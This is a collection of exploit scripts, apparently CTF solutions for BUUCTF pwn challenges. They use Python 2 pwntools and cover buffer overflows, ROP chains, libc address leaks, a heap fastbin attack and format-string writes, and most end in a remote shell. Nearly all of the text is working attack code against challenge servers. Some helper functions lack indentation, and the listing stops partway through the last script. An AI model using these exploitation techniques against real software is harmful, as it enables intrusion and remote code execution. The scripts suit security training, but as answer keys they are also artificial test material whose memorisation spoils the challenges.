NO.00 pwn1_sctf_2016_sovle
exp
#-*- coding:utf-8-*-
# pwn1_sctf_2016 solver (Python 2 / pwntools): sends one overflow payload to
# the remote training instance and drops into an interactive session.
from pwn import *
# Hard-coded BUUCTF instance endpoint; the port is per-deployment.
p = remote('node3.buuoj.cn',28928)
#print p.recvuntil('Tell me something about yourself: ')
# 0x14 bytes of 'I', 4 bytes of padding, then the target address.
# NOTE(review): p64 packs the 0x0804xxxx value into 8 bytes (four trailing
# NUL bytes) — confirm that is what this 32-bit-looking binary expects.
payload = 'I'*0x14 + 'a'*4 + p64(0x08048F0D)
p.sendline(payload)
p.interactive()
NO.01 warmup_csaw_2016_sovle
exp
#-*- coding:utf-8-*
# warmup_csaw_2016 solver (Python 2 / pwntools). The chain calls the function
# at gets_addr with the bss address as argument, then the function at sys_addr
# with the same argument.
from pwn import *
io=remote("node2.buuoj.cn.wetolink.com",28872)
#io=process("./warmup_csaw_2016")
# Gadget / symbol addresses are specific to this binary build.
pop_rdi = 0x400713
# pop_rsi_r15 is defined but not used in the chain below.
pop_rsi_r15 = 0x400711
bss = 0x601058
gets_addr = 0x400500
sys_addr = 0x4004d0
print io.recv()
# 0x40 + 8 bytes of filler, then: pop rdi ; bss ; gets_addr ; pop rdi ; bss ; sys_addr.
payload = 'a'*0x40+'a'*8 +p64(pop_rdi) + p64(bss) + p64(gets_addr) + p64(pop_rdi)+p64(bss)+p64(sys_addr)
io.sendline(payload)
io.interactive()
NO.02 babyheap_0ctf_2017_sovle
exp
# babyheap_0ctf_2017 solver (Python 2 / pwntools). Drives the challenge's
# numeric menu (1 allocate / 2 fill / 3 free / 4 dump) through the helpers.
# NOTE: the helper bodies are not indented in this listing; the file as
# pasted is not valid Python until each def body is re-indented.
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
# Runs against a local process (the remote line is commented out). The libc
# loaded here is the host's, so the libc offsets used below are tied to it.
p =process('./babyheap_0ctf_2017')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#p =remote('node3.buuoj.cn',26914)
# Menu 1: allocate a chunk of `size` bytes.
def Allocate(size):
p.recvuntil("Command:")
p.sendline("1")
p.recvuntil("Size:")
p.sendline(str(size))
# Menu 2: write `con` into chunk `idx`; the size sent is len(con).
# (The prompt string here has a trailing space, unlike the other helpers;
# recvuntil tolerates both.)
def Fill(idx,con):
p.recvuntil("Command: ")
p.sendline("2")
p.recvuntil("Index:")
p.sendline(str(idx))
p.recvuntil("Size:")
p.sendline(str(len(con)))
p.recvuntil("Content:")
p.sendline(con)
# Menu 3: free chunk `idx`.
def Free(idx):
p.recvuntil("Command:")
p.sendline("3")
p.recvuntil("Index:")
p.sendline(str(idx))
# Menu 4: dump chunk `idx`; returns the raw line that follows "Content: \n".
def Dump(idx):
p.recvuntil("Command:")
p.sendline("4")
p.recvuntil("Index:")
p.sendline(str(idx))
p.recvuntil('Content: \n')
return p.recvline()
# NOTE(review): the trailing "#idx=N" comments on the Allocate calls do not
# line up with the indices used by the following Fill/Free calls (e.g. the
# allocation marked idx=2 is followed by Fill(1, ...)); verify the bookkeeping.
Allocate(0x60)#idx=0
Allocate(0x30)#idx=1
#sleep(1)
# Fill writes 0x70 bytes into the chunk that was requested with size 0x60.
Fill(0,"a"*0x60+p64(0)+p64(0x71))
Allocate(0x100)#idx=2
Fill(2,"a"*0x20+p64(0)+p64(0x71))
Free(1)
Allocate(0x60)#idx=2
Fill(1,"a"*0x30+p64(0)+p64(0x111))
Allocate(0x60)
Free(2)
#gdb.attach(p)
# Dump(1) is issued twice; each call is a full menu round-trip and only the
# second result is parsed.
print Dump(1)
#print hexDump(1)[:-8]
# Takes 8 bytes from near the end of the dumped line and subtracts 0x58.
leak = u64(Dump(1)[-25:-17])-0x58
print "leak:"+hex(leak)
# 0x3c4b20 is a constant for one specific libc build — TODO confirm it
# matches the libc loaded above.
base=leak-0x3c4b20
malloc_hook=base+libc.sym['__malloc_hook']
print hex(malloc_hook)
Free(1)
# Active debugger attach: spawns gdb on the process and is not suitable for
# unattended runs.
gdb.attach(p)
Fill(0,"a"*0x60+p64(0)+p64(0x71)+p64(malloc_hook-0x23)+p64(0))
Allocate(0x60)#idx
Allocate(0x60)#idx
# base+0x4526a is another libc-build-specific offset.
Fill(2,"a"*3+p64(0)+p64(0)+p64(base+0x4526a))
#gdb.attach(p)
#gdb.attach(p)
Allocate(0x100)#idx4
p.interactive()
NO.03 babyfengshui_sovle
exp
#-*- coding:utf-8-*-
# babyfengshui solver (Python 2 / pwntools). Menu driver for
# 0 add / 1 delete / 2 display / 3 update. display_note(1) is used to read
# 4 bytes at free@GOT, and update_note(1, ...) then writes through the same
# pointer. Helper bodies are not indented in this listing.
from pwn import *
from LibcSearcher import *
#p=remote('111.198.29.45',35423)
p = remote('node3.buuoj.cn',26557)
elf=ELF('./babyfengshui')
#libc = ELF('libc.so.6')
# NOTE(review): LibcSearcher is seeded with a literal address rather than
# with free_addr leaked further down, so the libc selection does not follow
# the live leak; confirm the two agree.
obj=LibcSearcher('free',0xf7659750)
# Menu 0: add a note with description `size`, fixed name 'AAA', and `text`
# of declared length `length`.
def add_note(size,length,text):
p.recvuntil('Action: ')
p.sendline('0')
p.recvuntil('size of description: ')
p.sendline(str(size))
p.recvuntil('name: ')
p.sendline('AAA')
p.recvuntil('text length: ')
p.sendline(str(length))
p.recvuntil('text: ')
p.sendline(text)
# Menu 1: delete note `idx`.
def delete_note(idx):
p.recvuntil('Action: ')
p.sendline('1')
p.recvuntil('index: ')
p.sendline(str(idx))
# Menu 2: display note `idx`.
def display_note(idx):
p.recvuntil('Action: ')
p.sendline('2')
p.recvuntil('index: ')
p.sendline(str(idx))
# Menu 3: update the text of note `idx`.
def update_note(idx,length,text):
p.recvuntil('Action: ')
p.sendline('3')
p.recvuntil('index: ')
p.sendline(str(idx))
p.recvuntil('text length: ')
p.sendline(str(length))
p.sendlineafter('text: ',text)
add_note(0x80,0x80,'abcd')
add_note(0x80,0x80,'efgh')
add_note(0x8,0x8,'/bin/sh\00')
delete_note(0)
# Declared text length 0x19c exceeds the 0x100 description size; the last
# 4 bytes are free@GOT.
add_note(0x100,0x19c,'a'*0x198 + p32(elf.got['free']))
display_note(1)
p.recvuntil('description: ')
free_addr=u32(p.recv(4))
print hex(free_addr)
# Resolve system from the leaked free address using the LibcSearcher offsets.
system_addr = free_addr - (obj.dump('free') - obj.dump('system'))
log.info("system_addr 0x%x" % system_addr)
update_note(1,0x4,p32(system_addr))
delete_note(2)
p.interactive()
NO.04 第五空间2019 决赛]PWN5-sovle
exp
#-*- coding:utf-8-*-
# [第五空间2019 决赛]PWN5 solver (Python 2 / pwntools): format-string write
# via the "name" prompt, then a matching "passwd" value.
from pwn import *
context(os="linux", arch="i386", log_level="debug")
#p = process('./第五空间2019 决赛]PWN5')
p = remote('node3.buuoj.cn',27557)
elf = ELF('第五空间2019 决赛]PWN5')
# Format-string argument index at which the input buffer starts.
offset = 10
# The triple-quoted block below is an unused alternative kept as a string
# literal; it is evaluated and discarded, never executed.
'''
#这个方法是将atoi改为system,输入密码时直接传入/bin/sh,if语句中直接得到shell.
system_addr = 0x08049080
aoti_addr = elf.got['atoi']
p.recvuntil('your name:')
payload = fmtstr_payload(offset,{aoti_addr:system_addr})
p.sendline(payload)
p.recvuntil('your passwd:')
p.sendline('/bin/sh\x00')
p.interactive()
'''
addr=0x0804C044 #unk_804C044_addr
# Four consecutive byte addresses, each written by one %hhn below.
payload=p32(addr)+p32(addr+1)+p32(addr+2)+p32(addr+3)
payload+='%10$hhn%11$hhn%12$hhn%13$hhn'
# %10$hhn means: write 1 byte to the address found at argument offset 10.
# %N$hn writes 2 bytes.
# %N$lln writes 8 bytes.
p.recvuntil('your name:')
p.sendline(payload)
p.recvuntil('your passwd:')
p.sendline(str(0x10101010))
# The four 0x10 values correspond to the data length of the four addresses
# in the payload: on 32-bit one address occupies 4 bytes.
p.interactive()
NO.05 get_started_3dsctf_2016_sovle
exp
#-*- coding:utf-8-*-
# get_started_3dsctf_2016 solver (Python 2 / pwntools): a chain of
# mprotect followed by read, then a second send carrying shellcraft output.
from pwn import *
context.arch = "i386"
context.log_level = "debug"
#sh = process("./get_started_3dsctf_2016")
sh = remote('node3.buuoj.cn',27290)
elf = ELF("get_started_3dsctf_2016")
# pop2_ret is defined but unused; pop3_ret cleans three arguments per call.
pop2_ret = 0x0809a7dc
pop3_ret = 0x0804f460
# 56 bytes of filler, then mprotect(0x080EB000, 0x3000, 7) and
# read(0, 0x080EBF80, 0x200), returning into 0x080EBF80.
payload = 'a' * 56 + p32(elf.symbols['mprotect']) + p32(pop3_ret) + p32(0x080EB000) + p32(0x3000) + p32(7) + p32(elf.symbols['read']) + p32(pop3_ret) + p32(0) + p32(0x080EBF80) + p32(0x200) + p32(0x080EBF80)
sh.sendline(payload)
#sleep(1)
#input()
# Second message is consumed by the read() call above.
sh.sendline(asm(shellcraft.sh()))
sh.interactive()
NO.06 not_the_same_3dsctf_2016_sovle
exp
#-*- coding:utf-8-*-
# not_the_same_3dsctf_2016 solver (Python 2 / pwntools): same shape as the
# get_started solver — mprotect then read, with a second send for the payload.
from pwn import *
context(os="linux", arch="i386", log_level="debug")
#p = process('./not_the_same_3dsctf_2016')
p = remote('node3.buuoj.cn',26723)
elf = ELF('not_the_same_3dsctf_2016')
offset = 0x2d
# Three-pop gadget used to discard arguments between calls.
ppp = 0x0809e3e5
bss = 0x080EC624
# Name suggests a PLT/GOT page base; only its numeric value is used — TODO confirm.
pit_got = 0x080EB000
payload = 'a'*offset + p32(elf.symbols['mprotect'])
payload += p32(ppp) + p32(pit_got) + p32(0x1001)+ p32(7) + p32(elf.symbols['read'])
payload += p32(ppp) + p32(0) + p32(bss) + p32(0x1000) + p32(bss)
p.sendline(payload)
# Short pause so the two sends are not merged before read() is reached.
sleep(0.2)
p.sendline(asm(shellcraft.sh()))
p.interactive()
# Unused alternative kept as a string literal (not executed).
'''
#本地可行
offset = 0x2d
get_secret = 0x080489A0
fl4g = 0x080ECA2D
printf = 0x0804F0A0
payload = 'a'*offset + p32(get_secret)
payload += p32(printf)+p32(1) + p32(fl4g)
p.sendline(payload)
p.interactive()
'''
NO.07 ciscn_2019_n_8_sovle
exp
#-*- coding:utf-8-*-
# ciscn_2019_n_8 solver (Python 2 / pwntools): one fixed-byte payload.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
#p = process('./ciscn_2019_n_8')
p = remote('node3.buuoj.cn',26718)
p.recv()
# 53 bytes of 0x11.
payload = '\x11'*53
p.sendline(payload)
p.interactive()
NO.08 pwn2 sovle
exp
#-*- coding:utf-8-*-
# pwn2 solver (Python 2 / pwntools), local process only: first input is
# written at the "bss:" prompt, the second at the "stack:" prompt.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
#p = remote()
p = process('./pwn2')
elf = ELF('pwn2')
# bss and ret are defined but unused below.
bss = 0x0601060
rdi = 0x0000000000400693
x = 0x00400001
ret = 0x00000000004004ae
payload = p64(rdi) + p64(x)+ p64(x) + asm(shellcraft.sh())
#payload = asm(shellcraft.sh())
p.recvuntil('bss:\n')
# Padded to 112 bytes with 'a'.
p.sendline(payload.ljust(112,'a'))
payload1 = 'a'*(0xa+8) + p64(x)
p.recvuntil('stack:\n')
p.sendline(payload1)
p.interactive()
NO.09 [OGeek2019]babyrop _sovle
exp
#-*- coding:utf-8-*-
# [OGeek2019]babyrop solver (Python 2 / pwntools): leak write@GOT through
# write@PLT, compute system and "/bin/sh" from libc-2.23.so, send again.
from pwn import *
# NOTE(review): context is amd64 but every value is packed with p32; p32 is
# explicit so this only matters for asm/shellcraft, which are unused here.
context(os="linux", arch="amd64", log_level="debug")
# local toggles process vs remote; both branches load the same ELF and libc.
# The if/else bodies are not indented in this listing.
local = 0
if local:
p = process('./[OGeek2019]babyrop')
elf = ELF('[OGeek2019]babyrop')
libc = ELF('libc-2.23.so')
else:
p = remote('node3.buuoj.cn',28661)
elf = ELF('[OGeek2019]babyrop')
libc = ELF('libc-2.23.so')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = 0x08048825
# First input: a NUL byte followed by seven 0xff bytes.
payload1 = '\x00'+ '\xff'*7
p.sendline(payload1)
p.recvuntil('Correct\n')
# write(1, write_got, 4) and return to main_addr.
payload2 = 'a'* (0xe7+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload2)
write_addr = u32(p.recv(4))
offset = write_addr - libc.sym['write']
system_addr = libc.sym['system'] + offset
# .next() is Python 2 iterator syntax.
binsh = libc.search('/bin/sh').next() + offset
p.sendline(payload1)
p.recvuntil('Correct\n')
payload3 = 'a'*(0xe7+4) + p32(system_addr) + 'aaaa' + p32(binsh)
p.sendline(payload3)
p.interactive()
NO.10 铁人三项(第五赛区)_2018_rop_sovle
exp
#-*- coding:utf-8-*-
# 铁人三项(第五赛区)_2018_rop solver (Python 2 / pwntools): DynELF-based
# symbol resolution using a write@PLT leak primitive, then read "/bin/sh"
# into .bss and call system with it.
from pwn import *
context(os="linux", arch="i386", log_level="debug")
p = remote('node3.buuoj.cn',29800)
#p = process('./铁人三项(第五赛区)_2018_rop')
elf = ELF('铁人三项(第五赛区)_2018_rop')
write_plt=elf.plt['write']
read_plt=elf.plt['read']
main_addr=elf.symbols['main']
bss_addr=elf.symbols['__bss_start']
# Leak primitive for DynELF: write(1, address, 4) and return to main.
# Body is not indented in this listing.
def leak(address):
payload1='a'*(0x88+0x4)+p32(write_plt)+p32(main_addr)+p32(0x1)+p32(address)+p32(0x4)
p.sendline(payload1)
leak_address=p.recv(4)
return leak_address
# NOTE(review): the ELF is loaded a second time here instead of reusing `elf`.
d=DynELF(leak,elf=ELF('铁人三项(第五赛区)_2018_rop'))
sys_addr=d.lookup('system','libc')
# read(0, bss_addr, 8) and return to main; the next sendline feeds it.
payload2='a'*(0x88+0x4)+p32(read_plt)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8)
p.sendline(payload2)
p.sendline('/bin/sh')
payload3='a'*(0x88+0x4)+p32(sys_addr)+p32(main_addr)+p32(bss_addr)
p.sendline(payload3)
p.interactive()
NO.11 bjdctf_2020_babyrop_sovle
exp
#-*- coding:utf-8-*-
# bjdctf_2020_babyrop solver (Python 2 / pwntools): puts-leak of puts@GOT,
# libc identified with LibcSearcher, second chain to system("/bin/sh").
from pwn import *
from LibcSearcher import*
context(os="linux", arch="amd64", log_level="debug")
# if/else bodies are not indented in this listing.
local = 0
if local:
p = process('./bjdctf_2020_babyrop')
elf = ELF('bjdctf_2020_babyrop')
#libc = ELF('')
else:
p = remote('node3.buuoj.cn',26680)
elf = ELF('bjdctf_2020_babyrop')
#libc = ELF('')
junk = 32
popr = 0x0000000000400733
puts_got = elf.got["puts"]
puts_plt = elf.symbols["puts"]
# NOTE(review): the next two names are swapped relative to what they hold
# (read_plt holds the GOT entry, read_got the symbol); both are unused.
read_plt = elf.got["read"]
read_got = elf.symbols["read"]
main_addr = 0x04006AD
start_addr = 0x400530
# 32 bytes of junk + 8 bytes saved-rbp filler, then pop rdi ; puts_got ; puts ; _start.
payload = junk*'A'+'BBBBBBBB'+p64(popr)+p64(puts_got)+p64(puts_plt)+p64(start_addr)
p.recvuntil("Pull up your sword and tell me u story!\n")
p.sendline(payload)
# Take the last 6 bytes up to and including the 0x7f byte, zero-extend to 8.
puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
log.info("puts_addr:"+hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
offset = puts_addr - libc.dump("puts")
sys_addr = offset+libc.dump("system")
binsh_addr = offset+libc.dump("str_bin_sh")
payload = junk*'A'+'BBBBBBBB'+p64(popr)+p64(binsh_addr)+p64(sys_addr)+p64(start_addr)
p.recvuntil("Pull up your sword and tell me u story!\n")
p.sendline(payload)
p.interactive()
NO.12 ciscn_2019_c_1_sovle
exp
#-*- coding:utf-8-*-
# ciscn_2019_c_1 solver (Python 2 / pwntools): leak __libc_start_main@GOT
# via puts through menu option 1, then a second chain using libc-2.27.so.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
p = remote('node3.buuoj.cn',28138)
#p = process('./ciscn_2019_c_1')
elf = ELF('ciscn_2019_c_1')
libc = ELF('libc-2.27.so')
# Select menu option 1 and send `pad` as the plaintext. Body not indented
# in this listing.
def send(pad):
print p.recvuntil('Input your choice!')
p.sendline('1')
print p.recvuntil('Input your Plaintext to be encrypted')
p.sendline(pad)
padding = 0x50+8
pop_rdi_addr = 0x400c83
main_addr = 0x0400B28
__libc_start_main_got_addr = elf.got['__libc_start_main']
puts_plt_addr = elf.plt['puts']
# Same value as `padding`, spelled out inline.
payload = 'a'*(0x50 + 8)
payload += p64(pop_rdi_addr)
payload += p64(__libc_start_main_got_addr)
payload += p64(puts_plt_addr)
payload += p64(main_addr)
send(payload)
'''
print p.recvline()
print p.recvline()
print p.recvline()
'''
p.recvuntil('@\n')
# `offest` is a misspelling of offset kept as-is (local name).
offest = u64(p.recvline().strip().ljust(8,'\x00')) - libc.sym['__libc_start_main']
system_addr = libc.sym['system'] + offest
bin_addr = libc.search('/bin/sh').next() + offest
# Extra ret gadget before the pop rdi chain — presumably for stack
# alignment ahead of the system call; confirm against the binary.
ret = 0x00000000004006b9
payload1 = 'a'*padding+ p64(ret) + p64(pop_rdi_addr) + p64(bin_addr) + p64(system_addr)
send(payload1)
p.interactive()
NO.13 [BJDCTF 2nd]r2t3 _sovle
exp
#-*- coding:utf-8-*-
# [BJDCTF 2nd]r2t3 solver (Python 2 / pwntools). `local = 1`, so as written
# this runs against a local process, not the remote instance.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./[BJDCTF 2nd]r2t3')
else:
p = remote('node3.buuoj.cn',29466)
system_addr=0x0804858B
# Total length is padded so that len(payload) lands in the accepted range.
payload = 'a'*8 + 'a'*(0x9+0x4) + p32(system_addr) + 'a'*(0x103-0x15-0x4)
# Bypass range (3,8]: 0x103 ~ 0x107 works. p.sendline() appends one extra
# newline character, so 0x103 also works.
p.recvuntil('[+]Please input your name:\n')
p.sendline(payload)
print(hex(len(payload)))
p.interactive()
NO.14 [BJDCTF 2nd]one_gadget _sovle
exp
#-*- coding:utf-8-*-
# [BJDCTF 2nd]one_gadget solver (Python 2 / pwntools): the program prints a
# printf address; the reply is a libc-2.29 one_gadget offset plus the slide.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./[BJDCTF 2nd]one_gadget')
else:
p = remote('node3.buuoj.cn',28292)
elf = ELF('[BJDCTF 2nd]one_gadget')
libc = ELF('libc-2.29.so')
# Candidate offsets for this libc build; index 3 is the one sent below.
one_gadget = [0xe237f,0xe2383,0xe2386,0x106ef8]
p.recvuntil(":0x")
# Parse the hex digits up to the newline.
printf_addr = int(p.recvuntil('\n'),16)
p.recvuntil(':')
# `offest` is a misspelling of offset kept as-is (local name).
offest = printf_addr - libc.sym['printf']
payload = one_gadget[3] + offest
# Sent as a decimal string.
p.sendline(str(payload))
p.interactive()
NO.15 jarvisoj_level0_sovle
exp
#-*- coding:utf-8-*-
# jarvisoj_level0 solver (Python 2 / pwntools), local process as written.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
p = process('./jarvisoj_level0')
#p = remote('node3.buuoj.cn',27617)
system_addr = 0x400460
binsh_addr = 0x040059A
# sysfuntions_addr is only used by the commented-out variant 1.
sysfuntions_addr= 0x00400596
p.recvuntil('\n')
#payload = 'a'*(0x80+8) + p64(sysfuntions_addr) # sovle1
# Variant 2: 0x80 bytes of filler, then system_addr followed by binsh_addr.
payload = 'a'*0x80 +p64(system_addr) +p64(binsh_addr) # sovle2
p.sendline(payload)
p.interactive()
NO.16 [HarekazeCTF2019]baby_rop _sovle
exp
#-*- coding:utf-8-*-
# [HarekazeCTF2019]baby_rop solver (Python 2 / pwntools). `local = 1`, so
# this runs against a local process as written.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./[HarekazeCTF2019]baby_rop')
else:
p = remote('node3.buuoj.cn',27724)
elf = ELF('[HarekazeCTF2019]baby_rop')
#libc = ELF('')
system_addr = 0x00400490
# system_addr1 is only used by the commented-out variant.
system_addr1 = 0x04005E3
sh_addr = 0x0601048
pop_rdi = 0x0000000000400683
# 0x10 + 8 bytes of filler, then pop rdi ; sh_addr ; system_addr.
payload = 'a'*(0x10+8) + p64(pop_rdi) + p64(sh_addr) + p64(system_addr)
#payload = 'a'*(0x10+8) + p64(pop_rdi) + p64(sh_addr)+ p64(system_addr1)
p.recvuntil("What's your name? ")
p.sendline(payload)
p.interactive()
NO.17 jarvisoj_level2 _sovle
exp
#-*- coding:utf-8-*-
# jarvisoj_level2 solver (Python 2 / pwntools). `local = 1`: local process.
from pwn import *
# NOTE(review): context says amd64 while the payload is built with p32;
# p32 is explicit so asm/shellcraft (unused here) are the only things affected.
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./jarvisoj_level2')
else:
p = remote('node3.buuoj.cn',29779)
#elf = ELF('')
#libc = ELF('')
system_addr = 0x804845C
# system_addr1 is only used by the commented-out variant.
system_addr1 = 0x08048320
binsh_addr = 0x0804A024
payload = 'a'*(0x88+4)+p32(system_addr)+p32(binsh_addr)
#payload = 'a'*(0x88+4)+p32(system_addr1)+'bbbb'+p32(binsh_addr)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
NO.18 bjdctf_2020_babystack_sovle
exp
#-*- coding:utf-8-*-
# bjdctf_2020_babystack solver (Python 2 / pwntools): oversized length
# answer, then a payload ending in binsh_addr.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./bjdctf_2020_babystack')
else:
p = remote('node3.buuoj.cn',26095)
#elf = ELF('bjdctf_2020_babystack')
#libc = ELF('/libc/ubuntu16/64/libc-2.23.so')
binsh_addr = 0x0004006E6
# 0x10 bytes of filler, 8 bytes of arbitrary saved-rbp filler, then the address.
payload = 'a'*(0x10) +p64(0x123123)+ p64(binsh_addr)
# sendafter + explicit '\n' instead of sendlineafter.
p.sendafter('Please input the length of your name:\n',str(123123)+'\n')
p.sendafter("What's u name?\n",payload+'\n')
p.interactive()
NO.19 ciscn_2019_n_5 _sovle
exp
#-*- coding:utf-8-*-
# ciscn_2019_n_5 solver (Python 2 / pwntools): shellcraft output goes into
# the "name" buffer at name_addr; the second input returns to it.
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./ciscn_2019_n_5')
else:
p = remote('node3.buuoj.cn',27053)
#elf = ELF('')
#libc = ELF('')
name_addr = 0x00601080
shellcode = asm(shellcraft.sh())
p.sendafter('tell me your name',shellcode+'\n')
# 0x20 + 8 bytes of filler, then name_addr.
payload = 'a'*(0x20+8) + p64(name_addr)
p.sendafter('What do you want to say to me?',payload+'\n')
p.interactive()
NO.20 ciscn_2019_s_3_sovle
exp
#-*- coding:utf-8-*-
# ciscn_2019_s_3 solver (Python 2 / pwntools). First round leaks a stack
# address through main; second round uses the six-register pop gadget and
# the mov rdx,[r13] ; call gadget. `local = 1` and gdb.attach is active, so
# this is set up for a local debugging session.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./ciscn_2019_s_3')
else:
p = remote('node3.buuoj.cn',25585)
elf = ELF('ciscn_2019_s_3')
#libc = ELF('')
main = elf.sym['main']
#main=0x0004004ED
execv = 0x04004E2
pop_rdi = 0x4005a3
pop_rbx_rbp_r12_r13_r14_r15 = 0x40059A
mov_rdxr13_call = 0x0400580
syscall = 0x00400517
# 16 bytes of "/bin/sh\0" twice, then return to main.
payload = '/bin/sh\00'*2 + p64(main)
#gdb.attach(p)
p.sendline(payload)
# Skip 0x20 bytes, then read an 8-byte value and subtract 0x138 (a
# stack-layout constant for this binary — TODO confirm).
p.recv(0x20)
binsh_addr = u64(p.recv(8)) - 0x138
print(hex(binsh_addr))
# Active debugger attach; not suitable for unattended runs.
gdb.attach(p)
payload = '/bin/sh\00'*2 + p64(pop_rbx_rbp_r12_r13_r14_r15)
# rbx, rbp, r12 = binsh_addr+0x50 ; r13, r14, r15 = 0
payload += p64(0)+p64(0)+p64(binsh_addr+0x50)
payload += p64(0)+p64(0)+p64(0)
payload += p64(mov_rdxr13_call)+p64(execv)
payload += p64(pop_rdi)+p64(binsh_addr)+p64(syscall)
p.sendline(payload)
p.interactive()
NO.21 jarvisoj_level2_x64 _sovle
exp
#-*- coding:utf-8-*-
# jarvisoj_level2_x64 solver (Python 2 / pwntools): pop rdi ; binsh ; system.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_level2_x64')
else:
p = remote('node3.buuoj.cn',27721)
#elf = ELF('')
#libc = ELF('')
pop_rdi = 0x00000000004006b3
# system_addr is defined but unused; the chain uses system_addr1.
system_addr = 0x040063E
system_addr1 = 0x004004C0
binsh_addr = 0x0600A90
payload = 'a'*(0x80+8)+p64(pop_rdi)+p64(binsh_addr)+p64(system_addr1)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
NO.22 [HarekazeCTF2019]baby_rop2 _sovle
exp
#-*- coding:utf-8-*-
# [HarekazeCTF2019]baby_rop2 solver (Python 2 / pwntools): leak read@GOT via
# printf, resolve system/"/bin/sh" from the host libc, second chain.
# `local = 1`: runs against a local process as written.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./[HarekazeCTF2019]baby_rop2')
else:
p = remote('node3.buuoj.cn',29812)
elf = ELF('[HarekazeCTF2019]baby_rop2')
# Host libc: offsets computed below are only valid against the same build.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
main = elf.sym['main']
read_got = elf.got['read']
# read_plt, printf_got, format_str and pop_rsi_r15 are defined but unused.
read_plt = elf.plt['read']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
format_str=0x400770 #%s
pop_rdi = 0x0000000000400733
pop_rsi_r15 = 0x0000000000400731
# 0x28 bytes of filler, then printf(read_got) and return to main.
payload = 'a'*(0x28) +p64(pop_rdi)+p64(read_got)+p64(printf_plt)+p64(main)
p.recvuntil('? ')
p.sendline(payload)
p.recvuntil('\n')
# Read up to the 0x7f byte and zero-extend to 8 bytes.
read_addr = u64(p.recvuntil("\x7f").ljust(8,'\x00'))
print hex(read_addr)
# LibcSearcher alternative kept as an unused string literal.
'''
libc = LibcSearcher('read',read_addr)
offset = read_addr - libc.dump('read')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
'''
offset = read_addr - libc.sym['read']
system = libc.sym['system'] + offset
binsh = libc.search('/bin/sh').next()+offset
payload = 'a'*(0x28)+p64(pop_rdi)+p64(binsh)+p64(system)
p.recvuntil('? ')
p.sendline(payload)
p.interactive()
NO.23 ciscn_2019_ne_5 _sovle
exp
#-*- coding:utf-8-*-
# ciscn_2019_ne_5 solver (Python 2 / pwntools): log in with the fixed
# password, menu 1 to store the payload, menu 4 to trigger it.
from pwn import *
from LibcSearcher import *
# NOTE(review): arch is amd64 but the payload is packed with p32 (explicit,
# so only asm/shellcraft — unused here — would be affected).
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./ciscn_2019_ne_5')
else:
p = remote('node3.buuoj.cn',25921)
elf = ELF('ciscn_2019_ne_5')
#libc = ELF('')
system = elf.plt['system']
# Address of an "sh" string inside the binary.
sh_addr = 0x080482EA
# 0x48 + 4 bytes of filler, system@PLT, dummy return address, argument.
payload = 'a'*(0x48+4)+p32(system)+p32(0xdeadbeef)+p32(sh_addr)
p.recvuntil('Please input admin password:')
p.sendline('administrator')
p.recvuntil('0.Exit\n')
p.sendline('1')
p.recvuntil(':')
p.sendline(payload)
p.recvuntil('0.Exit\n')
p.sendline('4')
p.interactive()
NO.24 pwn2_sctf_2016 _sovle
exp
#-*- coding:utf-8-*-
# pwn2_sctf_2016 solver (Python 2 / pwntools): a negative length answer,
# printf("%s", atoi@GOT) leak, then system/"/bin/sh" from the bundled libc.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./pwn2_sctf_2016')
else:
p = remote('node3.buuoj.cn',26427)
elf = ELF('pwn2_sctf_2016')
libc = ELF('libc/ubuntu16/32/libc-2.23.so')
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
# printf_got is defined but unused.
printf_got = elf.got['printf']
main_addr = elf.symbols['main']
# Address of a format string inside the binary.
format_addr = 0x080486F8
# Answers the length prompt with -1, then sends `payload` at the data prompt.
# Body is not indented in this listing.
def send(payload):
p.recvuntil('How many bytes do you want me to read? ')
p.sendline(str(-1))
p.recvuntil('data!\n')
p.sendline(payload)
# 0x2c + 4 bytes of filler, printf(format_addr, atoi_got), return to main.
payload = 'a'*(0x2c+4)+p32(printf_plt)+p32(main_addr)+p32(format_addr)+p32(atoi_got)
send(payload)
# 'You said: ' appears twice before the leaked bytes; skip both.
p.recvuntil('You said: ')
p.recvuntil('You said: ')
atoi_addr = u32(p.recv(4))
offset = atoi_addr - libc.sym['atoi']
system = libc.sym['system']+offset
binsh = libc.search('/bin/sh').next()+offset
payload = 'a'*(0x2c+4)+p32(system)+p32(0xdeefdedf)+p32(binsh)
send(payload)
p.interactive()
NO.25 ez_pz_hackover_2016 _sovle
exp
#-*- coding:utf-8-*-
# ez_pz_hackover_2016 solver (Python 2 / pwntools): parse the stack address
# the program prints, then send a payload that returns to shellcraft output.
from pwn import *
from LibcSearcher import *
context(os="linux", arch="i386", log_level="debug")
local = 0
if local:
